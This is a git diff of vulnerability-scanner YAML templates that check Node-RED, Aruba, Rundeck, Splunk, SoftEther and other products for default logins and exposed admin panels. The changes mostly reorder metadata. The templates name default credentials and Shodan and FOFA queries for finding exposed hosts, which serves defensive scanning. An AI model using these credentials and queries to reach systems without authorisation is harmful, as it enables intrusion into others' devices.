+# digest: 4b0a00483046022100a6e60cf558d5d6383bae690c8c770dbe0656def6cd80d1ddb7dfa85fe6ed1798022100d4981c561c132ddd0fab88f05be6f7d771c891e7958877ee6bcdf6725f637729:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/default-logins/node-red/nodered-default-login.yaml b/http/default-logins/node-red/nodered-default-login.yaml
index 311ca4e23a..c534b98a8e 100644
--- a/http/default-logins/node-red/nodered-default-login.yaml
+++ b/http/default-logins/node-red/nodered-default-login.yaml
@@ -8,16 +8,16 @@ info:
Allows attacker to log in and execute RCE on the Node-Red panel using the default credentials.
reference:
- https://quentinkaiser.be/pentesting/2018/09/07/node-red-rce/
+ classification:
+ cpe: cpe:2.3:a:nodered:node-red:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: http.favicon.hash:321591353
- product: node-red
vendor: nodered
+ product: node-red
+ shodan-query: http.favicon.hash:321591353
tags: default-login,node-red,dashboard
- classification:
- cpe: cpe:2.3:a:nodered:node-red:*:*:*:*:*:*:*:*
http:
- raw:
- |
@@ -52,4 +52,5 @@ http:
- type: status
status:
- 200
-# digest: 4b0a00483046022100d8d30003eefbac42678e7c0af4ef56d03cd3238cba5804360b9614d7555be2d5022100816a15007caea2f57c4b763f5b060505ecf5d16be221481b679bd26dbc74583d:922c64590222798bb761d5b6d8e72950
+
+# digest: 4b0a00483046022100d8d30003eefbac42678e7c0af4ef56d03cd3238cba5804360b9614d7555be2d5022100816a15007caea2f57c4b763f5b060505ecf5d16be221481b679bd26dbc74583d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/default-logins/o2oa/o2oa-default-login.yaml b/http/default-logins/o2oa/o2oa-default-login.yaml
index e77e4a9b86..4f53d66729 100755
--- a/http/default-logins/o2oa/o2oa-default-login.yaml
+++ b/http/default-logins/o2oa/o2oa-default-login.yaml
@@ -6,16 +6,16 @@ info:
severity: high
description: |
O2OA is an open source and free enterprise and team office platform. It provides four major platforms portal management, process management, information management, and data management. It integrates many functions such as work reporting, project collaboration, mobile OA, document sharing, process approval, and data collaboration. Meet various management and collaboration needs of enterprises.
+ classification:
+ cpe: cpe:2.3:a:zoneland:o2oa:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: title=="O2OA"
- product: o2oa
vendor: zoneland
+ product: o2oa
+ shodan-query: title=="O2OA"
tags: o2oa,default-login
- classification:
- cpe: cpe:2.3:a:zoneland:o2oa:*:*:*:*:*:*:*:*
http:
- raw:
- |
@@ -53,4 +53,4 @@ http:
status:
- 200
-# digest: 4a0a004730450220303448d4f063d3751339583dd30660c6c6c9cac3c3b3d566ffa9e589e4d6e1e30221009b62a303a85637afb15080524b83b3cd1005731fb64cb95dce721ecbb6325701:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a004730450220303448d4f063d3751339583dd30660c6c6c9cac3c3b3d566ffa9e589e4d6e1e30221009b62a303a85637afb15080524b83b3cd1005731fb64cb95dce721ecbb6325701:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/default-logins/others/aruba-instant-default-login.yaml b/http/default-logins/others/aruba-instant-default-login.yaml
index 8692146699..29bb14f148 100755
--- a/http/default-logins/others/aruba-instant-default-login.yaml
+++ b/http/default-logins/others/aruba-instant-default-login.yaml
@@ -8,16 +8,16 @@ info:
Aruba Instant is an AP device. The device has a default password, and attackers can control the entire platform through the default password admin/admin vulnerability, and use administrator privileges to operate core functions.
reference:
- https://www.192-168-1-1-ip.co/aruba-networks/routers/179/#:~:text=The%20default%20username%20for%20your,control%20panel%20of%20your%20router.
+ classification:
+ cpe: cpe:2.3:a:arubanetworks:aruba_instant:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- fofa-query: body="jscripts/third_party/raphael-treemap.min.js" || body="jscripts/third_party/highcharts.src.js"
- product: aruba_instant
vendor: arubanetworks
+ product: aruba_instant
+ fofa-query: body="jscripts/third_party/raphael-treemap.min.js" || body="jscripts/third_party/highcharts.src.js"
tags: aruba,default-login
- classification:
- cpe: cpe:2.3:a:arubanetworks:aruba_instant:*:*:*:*:*:*:*:*
http:
- raw:
- |
@@ -41,4 +41,4 @@ http:
- 'contains(body_1,"name=\"sid") && contains(body_1,"true\">Admin")'
condition: and
-# digest: 4a0a00473045022100ced4e051d16f58cbefe47b2e6d4acfb6f917418ea7694c5248d757815146178f02200e8ff5e2a45e4224bf56d9e4d5a2bb7ec6ea6c15cbf45fcdaf10431d404c9481:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a00473045022100ced4e051d16f58cbefe47b2e6d4acfb6f917418ea7694c5248d757815146178f02200e8ff5e2a45e4224bf56d9e4d5a2bb7ec6ea6c15cbf45fcdaf10431d404c9481:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/default-logins/others/inspur-clusterengine-default-login.yaml b/http/default-logins/others/inspur-clusterengine-default-login.yaml
index 5cf5cb1119..e3290640f3 100644
--- a/http/default-logins/others/inspur-clusterengine-default-login.yaml
+++ b/http/default-logins/others/inspur-clusterengine-default-login.yaml
@@ -7,15 +7,15 @@ info:
description: Inspur Clusterengine version 4 default admin login credentials were successful.
reference:
- https://blog.csdn.net/qq_36197704/article/details/115665793
- metadata:
- max-request: 1
- fofa-query: title="TSCEV4.0"
- product: clusterengine
- vendor: inspur
- tags: default-login,inspur,clusterengine
-
classification:
cpe: cpe:2.3:a:inspur:clusterengine:*:*:*:*:*:*:*:*
+ metadata:
+ max-request: 1
+ vendor: inspur
+ product: clusterengine
+ fofa-query: title="TSCEV4.0"
+ tags: default-login,inspur,clusterengine
+
http:
- raw:
- |
@@ -50,4 +50,4 @@ http:
status:
- 200
-# digest: 4a0a0047304502205a0a7bfae8326d478cff4165b5e1b4ada8d48f6b796c9e9cb65310a6c673bc1b022100ec27eaa708bfd5944f619c4d517ba9b77f0064eff47c13c95da156b9477c7057:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a0047304502205a0a7bfae8326d478cff4165b5e1b4ada8d48f6b796c9e9cb65310a6c673bc1b022100ec27eaa708bfd5944f619c4d517ba9b77f0064eff47c13c95da156b9477c7057:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/default-logins/powerjob-default-login.yaml b/http/default-logins/powerjob-default-login.yaml
index 6f7c724da7..eac1eb6a7d 100644
--- a/http/default-logins/powerjob-default-login.yaml
+++ b/http/default-logins/powerjob-default-login.yaml
@@ -8,17 +8,17 @@ info:
PowerJob default login credentials were discovered.
reference:
- https://www.yuque.com/powerjob/guidence/trial
+ classification:
+ cpe: cpe:2.3:a:powerjob:powerjob:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
+ vendor: powerjob
+ product: powerjob
shodan-query: http.title:"PowerJob"
fofa-query: title="PowerJob"
- product: powerjob
- vendor: powerjob
tags: powerjob,default-login
- classification:
- cpe: cpe:2.3:a:powerjob:powerjob:*:*:*:*:*:*:*:*
http:
- raw:
- |
@@ -51,4 +51,4 @@ http:
status:
- 200
-# digest: 4a0a00473045022100e0932bdfd3f0a186246164ab3130657f786b2085855c379a04ccfd23d996367d022008983aba06ca46d52608bddcdb44d48584b3570603c384713bdace7b95effb50:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a00473045022100e0932bdfd3f0a186246164ab3130657f786b2085855c379a04ccfd23d996367d022008983aba06ca46d52608bddcdb44d48584b3570603c384713bdace7b95effb50:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/default-logins/pyload/pyload-default-login.yaml b/http/default-logins/pyload/pyload-default-login.yaml
index c6681d6b8a..f0b01c37f7 100644
--- a/http/default-logins/pyload/pyload-default-login.yaml
+++ b/http/default-logins/pyload/pyload-default-login.yaml
@@ -8,16 +8,16 @@ info:
PyLoad Default Credentials were discovered.
reference:
- https://pypi.org/project/pyload-ng/#:~:text=Default%20username%3A%20pyload%20.,Default%20password%3A%20pyload%20.
+ classification:
+ cpe: cpe:2.3:a:pyload:pyload:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: html:"pyload"
- product: pyload
vendor: pyload
+ product: pyload
+ shodan-query: html:"pyload"
tags: default-login,pyload
- classification:
- cpe: cpe:2.3:a:pyload:pyload:*:*:*:*:*:*:*:*
http:
- raw:
- |
@@ -47,4 +47,4 @@ http:
status:
- 302
-# digest: 4b0a00483046022100887e6f5542621f9fd95a3e282c0a2de60e2fe8e1e0fc0fcbe1dd257885cb5d63022100a040e0e40efa61edc561c8aa3f0a00637973247e99c02bf2eef6d4d6a7aadbbc:922c64590222798bb761d5b6d8e72950
+# digest: 4b0a00483046022100887e6f5542621f9fd95a3e282c0a2de60e2fe8e1e0fc0fcbe1dd257885cb5d63022100a040e0e40efa61edc561c8aa3f0a00637973247e99c02bf2eef6d4d6a7aadbbc:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/default-logins/rainloop/rainloop-default-login.yaml b/http/default-logins/rainloop/rainloop-default-login.yaml
index aeda740ba2..b3495dbeee 100644
--- a/http/default-logins/rainloop/rainloop-default-login.yaml
+++ b/http/default-logins/rainloop/rainloop-default-login.yaml
@@ -7,16 +7,16 @@ info:
description: Rainloop WebMail default admin login credentials were successful.
reference:
- https://github.com/RainLoop/rainloop-webmail/issues/28
+ classification:
+ cpe: cpe:2.3:a:rainloop:webmail:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
- fofa-query: app="RAINLOOP-WebMail"
- product: webmail
vendor: rainloop
+ product: webmail
+ fofa-query: app="RAINLOOP-WebMail"
tags: default-login,rainloop,webmail,foss
- classification:
- cpe: cpe:2.3:a:rainloop:webmail:*:*:*:*:*:*:*:*
http:
- raw:
- |
@@ -28,6 +28,7 @@ http:
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Login={{user}}&Password={{pass}}&Action=AdminLogin&XToken={{token}}
+
attack: pitchfork
payloads:
user:
@@ -55,4 +56,4 @@ http:
status:
- 200
-# digest: 490a00463044022011d2ae91eff5020e269da659009bc07fbb88ab0ed413d851cef53af4fcbeb62902201e8b6d2a4e63b738161bf55d2099768df041004f0d36635923d28f1b70752a8b:922c64590222798bb761d5b6d8e72950
+# digest: 490a00463044022011d2ae91eff5020e269da659009bc07fbb88ab0ed413d851cef53af4fcbeb62902201e8b6d2a4e63b738161bf55d2099768df041004f0d36635923d28f1b70752a8b:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/default-logins/rconfig-default-login.yaml b/http/default-logins/rconfig-default-login.yaml
index 0054a5e753..254bbac8b7 100644
--- a/http/default-logins/rconfig-default-login.yaml
+++ b/http/default-logins/rconfig-default-login.yaml
@@ -8,16 +8,16 @@ info:
rConfig contains default credentials. An attacker can obtain access to user accounts and access sensitive information, modify data, and/or execute unauthorized operations.
reference:
- https://github.com/rconfig/rconfig
+ classification:
+ cpe: cpe:2.3:a:rconfig:rconfig:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
- shodan-query: http.title:"rConfig"
- product: rconfig
vendor: rconfig
+ product: rconfig
+ shodan-query: http.title:"rConfig"
tags: rconfig,default-login
- classification:
- cpe: cpe:2.3:a:rconfig:rconfig:*:*:*:*:*:*:*:*
http:
- raw:
- |
@@ -58,4 +58,4 @@ http:
status:
- 200
-# digest: 490a0046304402200b64a3d2c28156acb0f4d1497199fce906e807ca0afd3d5fcc6b504f04d233da022023da45f54e216f07870e9ffdbe57b77a1e87d9ce512a9033b6920f22e10bfa3e:922c64590222798bb761d5b6d8e72950
+# digest: 490a0046304402200b64a3d2c28156acb0f4d1497199fce906e807ca0afd3d5fcc6b504f04d233da022023da45f54e216f07870e9ffdbe57b77a1e87d9ce512a9033b6920f22e10bfa3e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/default-logins/riello/netman-default-login.yaml b/http/default-logins/riello/netman-default-login.yaml
index d93517ca21..c77534ebc0 100644
--- a/http/default-logins/riello/netman-default-login.yaml
+++ b/http/default-logins/riello/netman-default-login.yaml
@@ -8,17 +8,17 @@ info:
Default logins on Riello UPS NetMan 204 is used. Attacker can access to UPS and attacker can manipulate the UPS settings to disrupt the onsite systems.
reference:
- https://www.riello-ups.com/
+ classification:
+ cpe: cpe:2.3:o:riello-ups:netman_204_firmware:*:*:*:*:*:*:*:*
metadata:
verified: "true"
max-request: 1
+ vendor: riello-ups
+ product: netman_204_firmware
shodan-query: title:"Netman"
censys-query: services.http.response.body:"Netman204"
- product: netman_204_firmware
- vendor: riello-ups
tags: default-login,netman
- classification:
- cpe: cpe:2.3:o:riello-ups:netman_204_firmware:*:*:*:*:*:*:*:*
http:
- raw:
- |
@@ -45,4 +45,4 @@ http:
status:
- 200
-# digest: 4b0a00483046022100b566c3a1c77531131974bb1d1f4553f3a7a5e951c5918b21804652c643d32458022100aebdf668f07c2333d3a72dd90ea0575c484463d64a21c8791477f80269b1f235:922c64590222798bb761d5b6d8e72950
+# digest: 4b0a00483046022100b566c3a1c77531131974bb1d1f4553f3a7a5e951c5918b21804652c643d32458022100aebdf668f07c2333d3a72dd90ea0575c484463d64a21c8791477f80269b1f235:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/default-logins/rundeck/rundeck-default-login.yaml b/http/default-logins/rundeck/rundeck-default-login.yaml
index 08049adb07..8c0ccb9181 100644
--- a/http/default-logins/rundeck/rundeck-default-login.yaml
+++ b/http/default-logins/rundeck/rundeck-default-login.yaml
@@ -9,16 +9,15 @@ info:
reference:
- https://raw.githubusercontent.com/karkis3c/bugbounty/main/nuclei-templates/default-login/rundeck-default-login.yaml
- https://docs.rundeck.com/docs/learning/
+ classification:
+ cpe: cpe:2.3:a:pagerduty:rundeck:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
- fofa-query: app="Rundeck-Login"
- product: rundeck
vendor: pagerduty
+ product: rundeck
+ fofa-query: app="Rundeck-Login"
tags: default-login,rundeck
-
- classification:
- cpe: cpe:2.3:a:pagerduty:rundeck:*:*:*:*:*:*:*:*
variables:
username: admin
password: admin
@@ -31,7 +30,6 @@ http:
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
j_username={{username}}&j_password={{password}}
-
- |
GET /menu/home HTTP/1.1
Host: {{Hostname}}
@@ -48,4 +46,5 @@ http:
- type: status
status:
- 200
-# digest: 4a0a00473045022100fef40e31264843e21f89a843ba6f31f4109ca0016824152fbaf590c8371c9cc5022076659b8514e4eba7270ea5232d9f8545423a000bdf1274b7fc95aa9caa0cb968:922c64590222798bb761d5b6d8e72950
+
+# digest: 4a0a00473045022100fef40e31264843e21f89a843ba6f31f4109ca0016824152fbaf590c8371c9cc5022076659b8514e4eba7270ea5232d9f8545423a000bdf1274b7fc95aa9caa0cb968:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/default-logins/softether/softether-vpn-default-login.yaml b/http/default-logins/softether/softether-vpn-default-login.yaml
index 98c86b3cc0..e78bffa949 100644
--- a/http/default-logins/softether/softether-vpn-default-login.yaml
+++ b/http/default-logins/softether/softether-vpn-default-login.yaml
@@ -8,16 +8,16 @@ info:
The administrative password for the SoftEther VPN Server is blank.
reference:
- https://www.softether.org/4-docs/1-manual/3._SoftEther_VPN_Server_Manual/3.3_VPN_Server_Administration#Administration_Authority_for_the_Entire_SoftEther_VPN_Server
+ classification:
+ cpe: cpe:2.3:a:softether:vpn:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: title:"SoftEther VPN Server"
- product: vpn
vendor: softether
+ product: vpn
+ shodan-query: title:"SoftEther VPN Server"
tags: misconfig,vpn,softether,default-login
- classification:
- cpe: cpe:2.3:a:softether:vpn:*:*:*:*:*:*:*:*
http:
- raw:
- |
@@ -30,7 +30,7 @@ http:
username:
- administrator
password:
- -
+ - null
matchers-condition: and
matchers:
@@ -44,4 +44,5 @@ http:
- type: status
status:
- 200
-# digest: 490a0046304402205c1ef0dce69c50da55acaa53406c82710813d759723176e6ef4e4fee858b7bca02200b895a7367f4e624433a856e0dbf9d38de950d2d115ca5c5527c82ad81ba5394:922c64590222798bb761d5b6d8e72950
+
+# digest: 490a0046304402205c1ef0dce69c50da55acaa53406c82710813d759723176e6ef4e4fee858b7bca02200b895a7367f4e624433a856e0dbf9d38de950d2d115ca5c5527c82ad81ba5394:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/default-logins/splunk/splunk-default-login.yaml b/http/default-logins/splunk/splunk-default-login.yaml
index a25fe918ac..557122149b 100644
--- a/http/default-logins/splunk/splunk-default-login.yaml
+++ b/http/default-logins/splunk/splunk-default-login.yaml
@@ -6,16 +6,16 @@ info:
severity: high
description: |
Splunk Default Password Vulnerability exposes systems to unauthorized access, compromising data integrity and security.
+ classification:
+ cpe: cpe:2.3:a:splunk:splunk:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 9
- shodan-query: http.title:"Splunk"
- product: splunk
vendor: splunk
+ product: splunk
+ shodan-query: http.title:"Splunk"
tags: default-login,splunk
- classification:
- cpe: cpe:2.3:a:splunk:splunk:*:*:*:*:*:*:*:*
http:
- raw:
- |
@@ -47,9 +47,9 @@ http:
- "admin"
- "splunk"
- "toor"
-
stop-at-first-match: true
host-redirects: true
+
matchers-condition: and
matchers:
- type: word
@@ -70,4 +70,5 @@ http:
part: header
regex:
- 'cval=([0-9]+)'
-# digest: 4b0a00483046022100ce91d4b9bd6a78ad0f1da61f3e9222cdb9db0f17bd4baa08ad302f1a57013161022100f2a44470cac093eedcba91b9a41d16f1c1141f063824121f54ebe9568bfab88f:922c64590222798bb761d5b6d8e72950
+
+# digest: 4b0a00483046022100ce91d4b9bd6a78ad0f1da61f3e9222cdb9db0f17bd4baa08ad302f1a57013161022100f2a44470cac093eedcba91b9a41d16f1c1141f063824121f54ebe9568bfab88f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/default-logins/wazuh-default-login.yaml b/http/default-logins/wazuh-default-login.yaml
index 14cf15ea05..018a68af89 100644
--- a/http/default-logins/wazuh-default-login.yaml
+++ b/http/default-logins/wazuh-default-login.yaml
@@ -10,16 +10,16 @@ info:
- https://documentation.wazuh.com/current/user-manual/user-administration/password-management.html
- https://wazuh.com
- https://documentation.wazuh.com/current/deployment-options/docker/wazuh-container.html#single-node-deployment
+ classification:
+ cpe: cpe:2.3:a:wazuh:wazuh:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 7
- shodan-query: "title:\"Wazuh\""
- product: wazuh
vendor: wazuh
+ product: wazuh
+ shodan-query: "title:\"Wazuh\""
tags: wazuh,default-login
- classification:
- cpe: cpe:2.3:a:wazuh:wazuh:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -73,4 +73,5 @@ http:
- type: status
status:
- 200
-# digest: 4a0a004730450221009455b6beb3dd3660a1acfbfb547e2a94b8160fcbf9501c51f246568d7d26b21702204c46b154f7b28cad6aa4a6fc66515aff039e95ba59642d2b70729598de351bdb:922c64590222798bb761d5b6d8e72950
+
+# digest: 4a0a004730450221009455b6beb3dd3660a1acfbfb547e2a94b8160fcbf9501c51f246568d7d26b21702204c46b154f7b28cad6aa4a6fc66515aff039e95ba59642d2b70729598de351bdb:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/exposed-panels/acti-panel.yaml b/http/exposed-panels/acti-panel.yaml
index 7243bf1045..75e678aa1d 100644
--- a/http/exposed-panels/acti-panel.yaml
+++ b/http/exposed-panels/acti-panel.yaml
@@ -4,17 +4,17 @@ info:
name: ACTi Video Monitoring Panel - Detection
author: DhiyaneshDk
severity: info
+ classification:
+ cpe: cpe:2.3:o:acti:camera_firmware:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
+ vendor: acti
+ product: camera_firmware
shodan-query: title:"Web Configurator" html:"ACTi"
fofa-query: app="ACTi-视频监控"
- product: camera_firmware
- vendor: acti
tags: acti,panel,login,detect
- classification:
- cpe: cpe:2.3:o:acti:camera_firmware:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -32,4 +32,5 @@ http:
- type: status
status:
- 200
-# digest: 490a0046304402202ff45925f682afb5561ce24b6edb6a297d24f4b8bb8e68ddaa8f74ebb6bdf51202201064bc5389f172c1cce1197e8715c77af9f209193cc6b3a7b4f0965cb0183303:922c64590222798bb761d5b6d8e72950
+
+# digest: 490a0046304402202ff45925f682afb5561ce24b6edb6a297d24f4b8bb8e68ddaa8f74ebb6bdf51202201064bc5389f172c1cce1197e8715c77af9f209193cc6b3a7b4f0965cb0183303:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/exposed-panels/adguard-panel.yaml b/http/exposed-panels/adguard-panel.yaml
index f228123337..a5ac6685ce 100644
--- a/http/exposed-panels/adguard-panel.yaml
+++ b/http/exposed-panels/adguard-panel.yaml
@@ -6,16 +6,16 @@ info:
severity: info
description: |
AdGuard panel has been detected.
- metadata:
- max-request: 1
- verified: true
- fofa-query: title="AdGuard Home"
- product: adguard
- vendor: adguard
- tags: adguard,panel,login,detect
-
classification:
cpe: cpe:2.3:a:adguard:adguard:*:*:*:*:*:*:*:*
+ metadata:
+ verified: true
+ max-request: 1
+ vendor: adguard
+ product: adguard
+ fofa-query: title="AdGuard Home"
+ tags: adguard,panel,login,detect
+
http:
- method: GET
path:
@@ -34,4 +34,5 @@ http:
- type: status
status:
- 200
-# digest: 490a004630440220730adc9fcdcc4df45177d9cfab02b37df33d1945732441c4dac5811faf288eb902206f66cb45c1b423bfe9a4e9511d534b50f575855c1f5c26bf533e3a81db6fe63c:922c64590222798bb761d5b6d8e72950
+
+# digest: 490a004630440220730adc9fcdcc4df45177d9cfab02b37df33d1945732441c4dac5811faf288eb902206f66cb45c1b423bfe9a4e9511d534b50f575855c1f5c26bf533e3a81db6fe63c:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/exposed-panels/airos-panel.yaml b/http/exposed-panels/airos-panel.yaml
index 37e1b75251..e6350fafbb 100644
--- a/http/exposed-panels/airos-panel.yaml
+++ b/http/exposed-panels/airos-panel.yaml
@@ -6,16 +6,16 @@ info:
severity: info
description: |
AirOS panel was detected.
+ classification:
+ cpe: cpe:2.3:o:ui:airos:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: "http.favicon.hash:-697231354"
- product: airos
vendor: ui
+ product: airos
+ shodan-query: "http.favicon.hash:-697231354"
tags: airos,panel
- classification:
- cpe: cpe:2.3:o:ui:airos:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -31,4 +31,5 @@ http:
- type: status
status:
- 200
-# digest: 490a00463044022029f1587f6c760a398c179915decdd1c6f7492d915a4cda673ba9be590756dc5802207e0d46fae9185acbfe36d2c9bea4822152a5ea03b718f73fd56f17bf2d7ec4c5:922c64590222798bb761d5b6d8e72950
+
+# digest: 490a00463044022029f1587f6c760a398c179915decdd1c6f7492d915a4cda673ba9be590756dc5802207e0d46fae9185acbfe36d2c9bea4822152a5ea03b718f73fd56f17bf2d7ec4c5:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/exposed-panels/apache/apache-apollo-panel.yaml b/http/exposed-panels/apache/apache-apollo-panel.yaml
index cf0cb9a6a1..3d237a2b9f 100644
--- a/http/exposed-panels/apache/apache-apollo-panel.yaml
+++ b/http/exposed-panels/apache/apache-apollo-panel.yaml
@@ -4,16 +4,16 @@ info:
name: Apache Apollo Panel - Detect
author: ritikchaddha
severity: info
+ classification:
+ cpe: cpe:2.3:a:apache:activemq_apollo:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: title:"Apache Apollo"
- product: activemq_apollo
vendor: apache
+ product: activemq_apollo
+ shodan-query: title:"Apache Apollo"
tags: panel,apache,apollo,login,detect
- classification:
- cpe: cpe:2.3:a:apache:activemq_apollo:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -29,4 +29,5 @@ http:
- type: status
status:
- 200
-# digest: 4a0a0047304502210091d96867344b35c42563552bc564b4182466d6cac4abee2d338984b6e1cdd7d6022074f11714cb13bb709904658251bcccfdc4edba265448bd850d731a800f148d77:922c64590222798bb761d5b6d8e72950
+
+# digest: 4a0a0047304502210091d96867344b35c42563552bc564b4182466d6cac4abee2d338984b6e1cdd7d6022074f11714cb13bb709904658251bcccfdc4edba265448bd850d731a800f148d77:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/exposed-panels/aspcms-backend-panel.yaml b/http/exposed-panels/aspcms-backend-panel.yaml
index cdcff7340f..ad5adcd7ff 100644
--- a/http/exposed-panels/aspcms-backend-panel.yaml
+++ b/http/exposed-panels/aspcms-backend-panel.yaml
@@ -8,16 +8,16 @@ info:
ASPcms /plug/oem/AspCms_OEMFun.asp leak backend url.
reference:
- https://github.com/GREENHAT7/pxplan/blob/main/goby_pocs/Aspcms_Backend_Leak.json
+ classification:
+ cpe: cpe:2.3:a:asp4cms:aspcms:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
- fofa-query: app="ASPCMS"
- product: aspcms
vendor: asp4cms
+ product: aspcms
+ fofa-query: app="ASPCMS"
tags: panel,login,aspcms,admin
- classification:
- cpe: cpe:2.3:a:asp4cms:aspcms:*:*:*:*:*:*:*:*
http:
- raw:
- |
@@ -40,4 +40,5 @@ http:
- 'status_code_1 == 200 && contains(body_1,"alert(")'
- 'status_code_2 == 200 && contains(body_2,"var txtUserName = document.getElementById(")'
condition: and
-# digest: 490a004630440220234479820f4cc17b655263c9954725359c7d3dcb06092d722a81fa09cc027c2d02204e2d96c6500cad3ed9161ad8d9b391630442e9f68ac7cc0dfc0332a2c71de186:922c64590222798bb761d5b6d8e72950
+
+# digest: 490a004630440220234479820f4cc17b655263c9954725359c7d3dcb06092d722a81fa09cc027c2d02204e2d96c6500cad3ed9161ad8d9b391630442e9f68ac7cc0dfc0332a2c71de186:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/exposed-panels/atlassian-bamboo-panel.yaml b/http/exposed-panels/atlassian-bamboo-panel.yaml
index 49b1e6ec8c..90223cc938 100644
--- a/http/exposed-panels/atlassian-bamboo-panel.yaml
+++ b/http/exposed-panels/atlassian-bamboo-panel.yaml
@@ -8,16 +8,16 @@ info:
Atlassian Bamboo login panel was detected.
reference:
- https://www.atlassian.com/software/bamboo
+ classification:
+ cpe: cpe:2.3:a:atlassian:bamboo:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: http.title:"Bamboo"
- product: bamboo
vendor: atlassian
+ product: bamboo
+ shodan-query: http.title:"Bamboo"
tags: panel,bamboo,login,detect
- classification:
- cpe: cpe:2.3:a:atlassian:bamboo:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -45,4 +45,5 @@ http:
regex:
- 'version\s+([0-9A-Za-z\s\.]+)\s+-'
- 'pvpVersion = "([a-z0-9.]+)";'
-# digest: 490a00463044022077379f6cb3ccaffdd11f65581956ef6b17ad1721484cb296df66e78d4c9948af022046cc1693337f88f3eff468bb4785c6cc8065c3633a1edf960d6310d6620862c7:922c64590222798bb761d5b6d8e72950
+
+# digest: 490a00463044022077379f6cb3ccaffdd11f65581956ef6b17ad1721484cb296df66e78d4c9948af022046cc1693337f88f3eff468bb4785c6cc8065c3633a1edf960d6310d6620862c7:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/exposed-panels/audiobookshelf-panel.yaml b/http/exposed-panels/audiobookshelf-panel.yaml
index 4c160d519e..409be5527f 100644
--- a/http/exposed-panels/audiobookshelf-panel.yaml
+++ b/http/exposed-panels/audiobookshelf-panel.yaml
@@ -6,6 +6,8 @@ info:
severity: info
reference:
- https://github.com/advplyr/audiobookshelf
+ classification:
+ cpe: cpe:2.3:a:audiobookshelf:audiobookshelf:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
@@ -14,8 +16,6 @@ info:
vendor: audiobookshelf
tags: panel,audiobookshelf,detect
- classification:
- cpe: cpe:2.3:a:audiobookshelf:audiobookshelf:*:*:*:*:*:*:*:*
http:
- method: GET
path:
diff --git a/http/exposed-panels/authelia-panel.yaml b/http/exposed-panels/authelia-panel.yaml
index 78e4b5fe04..a0412ddf79 100644
--- a/http/exposed-panels/authelia-panel.yaml
+++ b/http/exposed-panels/authelia-panel.yaml
@@ -9,16 +9,16 @@ info:
reference:
- https://github.com/authelia/authelia
- https://www.authelia.com/
+ classification:
+ cpe: cpe:2.3:a:authelia:authelia:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: title:"Login - Authelia"
- product: authelia
vendor: authelia
+ product: authelia
+ shodan-query: title:"Login - Authelia"
tags: login,panel,authelia
- classification:
- cpe: cpe:2.3:a:authelia:authelia:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -33,4 +33,5 @@ http:
- type: status
status:
- 200
-# digest: 490a00463044022011c652c8e4ad3e46de531e029c3bcd7fe019a1f7ef8a71aa7ef87b3d039c60d4022034538df50b7e165e8d36b3bbcb858d44a935fa2bc1592669221f17de9e1f0b50:922c64590222798bb761d5b6d8e72950
+
+# digest: 490a00463044022011c652c8e4ad3e46de531e029c3bcd7fe019a1f7ef8a71aa7ef87b3d039c60d4022034538df50b7e165e8d36b3bbcb858d44a935fa2bc1592669221f17de9e1f0b50:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/exposed-panels/beyondtrust-priv-panel.yaml b/http/exposed-panels/beyondtrust-priv-panel.yaml
index dffcf04241..a846296e29 100644
--- a/http/exposed-panels/beyondtrust-priv-panel.yaml
+++ b/http/exposed-panels/beyondtrust-priv-panel.yaml
